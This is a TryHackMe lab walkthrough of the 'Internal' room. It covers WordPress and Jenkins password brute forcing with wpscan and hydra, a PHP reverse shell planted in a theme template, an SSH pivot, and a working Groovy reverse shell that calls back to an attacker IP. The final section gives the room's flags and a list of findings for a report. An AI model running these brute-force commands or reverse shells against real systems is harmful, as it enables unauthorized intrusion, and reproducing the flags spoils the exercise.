Tryhackme - Internal

In this walkthrough, we go through the Internal room on TryHackMe. The room is rated hard on the platform and simulates a standard penetration test of a client machine: enumeration, exploitation, pivoting into an internal network and finally privilege escalation, validated by retrieving the user and root flags. On that note, let's get started.

Machine Info:

Title:       Internal
IP address:  10.10.150.195
Difficulty:  Hard
Objective:   Having accepted the project, you are provided with the client assessment environment. Secure the User and Root flags and submit them to the dashboard as proof of exploitation.

Task 1 – Pre-engagement Briefing

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in three weeks. 

Scope of Work

The client requests that an engineer conducts an external, web app, and internal assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).  The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt
  • Root.txt

Additionally, the client has provided the following scope allowances:

  • Ensure that you modify your hosts file to reflect internal.thm
  • Any tools or techniques are permitted in this engagement
  • Locate and note all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope

Phase 1 – Enumeration

  • First, a ping confirms the machine is live.

Pinging the machine

  • Next, an nmap SYN scan with version detection. Two ports are open, 22 (OpenSSH 7.6p1 on Ubuntu) and 80 (Apache httpd 2.4.29); 53/tcp shows as filtered.

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.150.195
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-20 21:43 IST

Nmap scan report for 10.10.150.195
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.46 seconds

  • Running Gobuster against port 80 reveals /blog, along with /wordpress and /phpmyadmin.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.150.195/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.150.195/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/20 21:48:17 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/blog                 (Status: 301) [Size: 313] [--> http://10.10.150.195/blog/]
/index.html           (Status: 200) [Size: 10918]                               
/javascript           (Status: 301) [Size: 319] [--> http://10.10.150.195/javascript/]
/phpmyadmin           (Status: 301) [Size: 319] [--> http://10.10.150.195/phpmyadmin/]
/server-status        (Status: 403) [Size: 278]                                       
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.150.195/wordpress/] 
                                                                                      
===============================================================
2023/04/20 21:49:53 Finished
===============================================================

  • Adding the target to the local /etc/hosts file, as the scope notes ask, so the WordPress blog can be reached as internal.thm.

/etc/hosts entry

10.10.150.195 internal.thm

Wordpress Blog

  • The site at /blog is a WordPress blog. I run wpscan against it to enumerate users and pick up any low-hanging fruit; it identifies a single user, admin, and confirms XML-RPC is enabled.

wh1terose@fsociety:~$ wpscan --url http://internal.thm/blog/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.150.195]
[+] Started: Thu Apr 20 22:06:15 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Apr 20 22:06:21 2023
[+] Requests Done: 24
[+] Cached Requests: 37
[+] Data Sent: 6.616 KB
[+] Data Received: 128.629 KB
[+] Memory used: 177.352 MB
[+] Elapsed time: 00:00:06

  • Next, wpscan's XML-RPC password attack against the admin user with rockyou. The password turns out to be my2boys.

wh1terose@fsociety:~$ wpscan --url http://internal.thm/blog/ --password-attack xmlrpc --max-threads 20 -P ~/Desktop/Wordlist/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.150.195]
[+] Started: Thu Apr 20 22:10:25 2023

-- snipped --

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / my2boys                                                                                                                                           
Trying admin / princess7 Time: 00:02:08 <=================                                                                      > (3900 / 18900) 20.63%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

[+] Finished: Thu Apr 20 22:12:49 2023
[+] Requests Done: 4082
[+] Cached Requests: 18
[+] Data Sent: 2.054 MB
[+] Data Received: 2.659 MB
[+] Memory used: 296.156 MB
[+] Elapsed time: 00:02:24
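
How wpscan's --password-attack xmlrpc actually tests credentials is worth seeing in code. The following Python is an added example for this write-up, not wpscan's source: it builds the wp.getUsersBlogs call (which WordPress authenticates before answering), batches guesses with system.multicall, and classifies replies offline. The endpoint URL is the one wpscan flagged above; the replies are constructed to match the shapes xmlrpc.php returns and nothing is sent to the target.

```python
"""wpscan-style XML-RPC credential testing, offline.

Added example for this write-up (not wpscan's source). It builds the requests
wpscan sends for --password-attack xmlrpc and classifies replies shaped like
xmlrpc.php's; the replies below are constructed, nothing is sent anywhere.
"""
from __future__ import annotations

import xmlrpc.client
from typing import Dict, Iterable, List

XMLRPC_URL = "http://internal.thm/blog/xmlrpc.php"   # endpoint wpscan flagged above


def build_login_probe(username: str, password: str) -> bytes:
    """wp.getUsersBlogs: WordPress authenticates the caller before answering,
    so the reply doubles as a credential oracle."""
    return xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs").encode()


def build_multicall(username: str, passwords: Iterable[str]) -> bytes:
    """system.multicall packs many guesses into one HTTP request, which is why
    XML-RPC brute force is so much faster than posting to wp-login.php."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def classify_response(body: bytes) -> str:
    """Single-call reply -> 'valid' | 'invalid' | 'error'.
    A wrong password comes back as fault 403 'Incorrect username or password.';
    a right one as an array of blog structs."""
    try:
        params, _ = xmlrpc.client.loads(body.decode())
    except xmlrpc.client.Fault as fault:
        return "invalid" if fault.faultCode == 403 else "error"
    except Exception:
        return "error"
    return "valid" if params and isinstance(params[0], list) else "error"


def classify_multicall(body: bytes, passwords: List[str]) -> Dict[str, str]:
    """Multicall reply: each element is [result] on success or a
    {faultCode, faultString} struct on failure. Pair them back to the guesses."""
    (results,), _ = xmlrpc.client.loads(body.decode())
    verdicts: Dict[str, str] = {}
    for pw, item in zip(passwords, results):
        if isinstance(item, dict) and "faultCode" in item:
            verdicts[pw] = "invalid" if item["faultCode"] == 403 else "error"
        elif isinstance(item, list) and len(item) == 1 and isinstance(item[0], list):
            verdicts[pw] = "valid"
        else:
            verdicts[pw] = "error"
    return verdicts


# Constructed replies in the shape xmlrpc.php produces (not captured from the room).
_BLOG = {"blogid": "1", "blogName": "Internal", "url": "http://internal.thm/blog/", "isAdmin": True}
FAULT_REPLY = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."), methodresponse=True).encode()
SUCCESS_REPLY = xmlrpc.client.dumps(([_BLOG],), methodresponse=True).encode()
MULTICALL_REPLY = xmlrpc.client.dumps(
    ([{"faultCode": 403, "faultString": "Incorrect username or password."}, [[_BLOG]]],),
    methodresponse=True).encode()

if __name__ == "__main__":
    print(classify_response(FAULT_REPLY), classify_response(SUCCESS_REPLY))
    print(classify_multicall(MULTICALL_REPLY, ["princess7", "my2boys"]))
```

The multicall path is the one defenders should care about: a single POST can carry hundreds of guesses, so rate limiting wp-login.php alone does nothing. Blocking xmlrpc.php (or at least system.multicall) when it is not needed removes the amplification.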
  • Logging into the WordPress admin dashboard at http://internal.thm/blog/wp-login.php with admin:my2boys.

Wordpress Dashboard

Phase 2 – Initial Access

  • For a first shell, I open Appearance > Theme Editor, select the 404.php template of the active theme and replace its contents with the classic PHP reverse shell, pointed at my IP and port 1234.

WordPress Theme Editor

  • The dashboard also exposes a blog post containing another set of credentials. They did not turn out to be useful anywhere on this box.

WordPress blog post

  • With a netcat listener on port 1234, requesting the edited template directly from the theme directory wpscan reported (http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php) executes it and gives us our first shell on the machine.

nc -lvnp 1234

Phase 3 – Escalating the user shell

  • The shell runs as www-data, the web server account, so we need to escalate to a real user to get the user flag. Looking around the filesystem, /opt contains wp-save.txt, a note holding the credentials of the user aubreanna.

www-data@internal:/$ cd opt
cd opt
www-data@internal:/opt$ ls
ls
containerd  wp-save.txt
www-data@internal:/opt$ cat wp-save.txt 
cat wp-save.txt
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123
www-data@internal:/opt$ su aubreanna
su aubreanna
Password: bubb13guM!@#123

aubreanna@internal:/opt$ 

  • Switching to aubreanna with su and reading user.txt gives the user flag.

User flag

  • A hints file in aubreanna's home directory says a Jenkins server is running on an internal address that we cannot reach from our attacking machine.

hints.txt

Phase 4 – Accessing Internal Networks

  • Jenkins is only reachable from inside the box, so I pivot with an SSH local port forward authenticated as aubreanna. -L 6767:172.17.0.2:8080 binds port 6767 on my attacking machine and relays anything sent to it, through the SSH session on internal.thm, to 172.17.0.2:8080. The login banner below shows docker0 at 172.17.0.1, so 172.17.0.2 is a Docker container running on the host.

wh1terose@fsociety:~/CTF/TryHackme/Internal$ ssh -L 6767:172.17.0.2:8080 aubreanna@internal.thm
The authenticity of host 'internal.thm (10.10.150.195)' can't be established.
ECDSA key fingerprint is SHA256:fJ/BlTrDF8wS8/eqyoej1aq/NmvQh79ABdkpiiN5tqE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'internal.thm' (ECDSA) to the list of known hosts.
aubreanna@internal.thm's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 20 17:51:13 UTC 2023

  System load:  0.08              Processes:              123
  Usage of /:   63.8% of 8.79GB   Users logged in:        0
  Memory usage: 49%               IP address for eth0:    10.10.150.195
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Aug  3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$ 

Pivoting to internal machines

  • Browsing to http://localhost:6767 brings up the Jenkins login panel. Default credentials such as admin:admin and admin:password do not work.

Jenkins Login Panel

  • Time to brute-force it. First, capture a login POST in Burp Suite to learn the form action and the parameter names (j_username, j_password) the attack has to fill in. Note from the Referer that a failed attempt lands on /loginError, the page that carries the error text.

POST /j_acegi_security_check HTTP/1.1
Host: localhost:6767
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Origin: http://localhost:6767
DNT: 1
Connection: close
Referer: http://localhost:6767/loginError
Cookie: JSESSIONID.18b6903e=node01i3fc1q755dtt1qyao1hqrrwj22.node0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0

j_username=admin&j_password=123&from=%2Fvar%2Flib%2Fjenkins%2Fsecrets%2FinitialAdminPassword&Submit=Sign+in
  • Hydra's http-post-form module takes the path, the form body with ^USER^ and ^PASS^ placeholders, and the string that marks a failed login, taken from the Jenkins error page. Running it against the tunnel with rockyou recovers the password spongebob for admin.

wh1terose@fsociety:~$ hydra -l admin -P ~/Desktop/Wordlist/rockyou.txt 127.0.0.1 -s6767 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
Hydra v9.5-dev (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-21 21:27:48
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 15000 login tries (l:1/p:15000), ~938 tries per task
[DATA] attacking http-post-form://127.0.0.1:6767/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[6767][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-21 21:28:46
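
What hydra's failure condition actually checks, and why the redirect matters here, as an added Python example for this write-up (not hydra's code). Jenkins answers a bad login with a 302 to /loginError, and only that page contains "Invalid username or password", so a brute-forcer that does not follow the redirect never sees the marker and calls every guess a success. The stand-in server below is constructed to mirror that behaviour using the password from the hydra run above; nothing contacts the tunnel.

```python
"""Hydra-style http-post-form verdicts against a Jenkins login, offline.

Added example for this write-up, not hydra's source. The stand-in server is
constructed: it reproduces only the behaviour that matters for the failure
check, namely that both outcomes are 302s and the error text lives on
/loginError.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import parse_qsl, urlencode

LOGIN_PATH = "/j_acegi_security_check"           # form action from the Burp capture
FAILURE_MARKER = "Invalid username or password"   # hydra's final ':' field


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


Fetch = Callable[[str, str, str], Response]   # (method, path, body) -> Response


def login_body(username: str, password: str, came_from: str = "/") -> str:
    """The form body hydra substitutes ^USER^ and ^PASS^ into."""
    return urlencode({"j_username": username, "j_password": password,
                      "from": came_from, "Submit": "Sign in"})


def fake_jenkins(valid: Dict[str, str]) -> Fetch:
    """Constructed stand-in for the Jenkins behind the tunnel (not a capture)."""
    def fetch(method: str, path: str, body: str = "") -> Response:
        if method == "POST" and path == LOGIN_PATH:
            form = dict(parse_qsl(body))
            user, pw = form.get("j_username"), form.get("j_password")
            if user in valid and valid[user] == pw:
                return Response(302, {"Location": form.get("from", "/")})
            return Response(302, {"Location": "/loginError"})
        if path == "/loginError":
            return Response(401, body="<div>Invalid username or password</div>")
        if path == "/":
            return Response(200, body="<title>Dashboard [Jenkins]</title>")
        return Response(404, body="Not Found")
    return fetch


def attempt_login(fetch: Fetch, username: str, password: str, max_redirects: int = 3) -> bool:
    """Hydra's default semantics: POST, follow redirects, then declare success
    unless the failure marker appears in the final page."""
    resp = fetch("POST", LOGIN_PATH, login_body(username, password))
    hops = 0
    while 300 <= resp.status < 400 and "Location" in resp.headers and hops < max_redirects:
        resp = fetch("GET", resp.headers["Location"], "")
        hops += 1
    return FAILURE_MARKER not in resp.body


def brute_force(fetch: Fetch, username: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate the failure check accepts, or None."""
    for candidate in wordlist:
        if attempt_login(fetch, username, candidate):
            return candidate
    return None


if __name__ == "__main__":
    jenkins = fake_jenkins({"admin": "spongebob"})
    print(brute_force(jenkins, "admin", ["123456", "password", "spongebob"]))
    # With redirects disabled every guess looks valid: the classic false positive.
    print(attempt_login(jenkins, "admin", "wrong", max_redirects=0))
```

The failure-string approach is fragile by design: a login page that changes its wording, or a lockout page that omits the marker, produces false positives. When the target redirects on both success and failure, as Jenkins does, checking the Location header (/loginError versus the requested page) is a sturdier condition than string matching.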

  • Got into the Jenkins admin dashboard. Next, we have to figure out a way to upload and execute a reverse shell.

Jenkins dashboard

Phase 5 – Getting root access

  • Manage Jenkins has a Script Console that executes arbitrary Groovy with the privileges of the Jenkins process, so any admin can run system commands. I paste the following reverse shell into it and catch the connection with a netcat listener on port 4444 (10.18.11.103 is my attacking machine).

String host = "10.18.11.103";   // attacking machine running the netcat listener
int port = 4444;
String cmd = "/bin/bash";

Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();

// Pump bytes between the shell and the socket until either side goes away
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

script console jenkins

netcat listener

  • The shell lands inside the Jenkins Docker container (the 172.17.0.2 box we tunnelled to), not on the host. In its /opt directory lies note.txt, which contains the root password for the host.

root credentials

  • The credentials are username root and password tr0ub13guM!@#123. Note the pattern: it mirrors aubreanna's password, another sign of credential reuse on this environment.

  • Back in the SSH session as aubreanna, su root with that password gives a root shell on the host and the root flag.

root flag

Task 2 – Deploy and Engage the Client Environment

Question 1 – User.txt Flag

THM{int3rna1_fl4g_1}

Question 2 – Root.txt Flag

THM{d0ck3r_d3str0y3r}

Conclusion:

So that was "Internal". To sum up: an nmap scan found ports 22 (SSH) and 80 (HTTP) open, and the web server hosted a WordPress blog. wpscan enumerated the admin user and brute-forced its password over XML-RPC, which got us into the dashboard. Editing the theme's 404.php into a PHP reverse shell gave initial access as www-data, and credentials left in /opt/wp-save.txt let us escalate to aubreanna for the user flag. A hint in her home directory pointed at a Jenkins instance on 172.17.0.2:8080 that was only reachable from the box, so an SSH local port forward exposed it on our machine, where hydra recovered the Jenkins admin password. From the Jenkins script console a Groovy reverse shell landed us inside the Jenkins container, whose /opt/note.txt held the host's root password; su root in the aubreanna session produced the root flag. For the client's report, the findings are: guessable passwords on both the WordPress and Jenkins admin accounts, XML-RPC left enabled (which makes the WordPress brute force cheap), credentials stored in plaintext notes on disk, Jenkins admin access equating to code execution through the script console, and password reuse between the container and the host's root account.
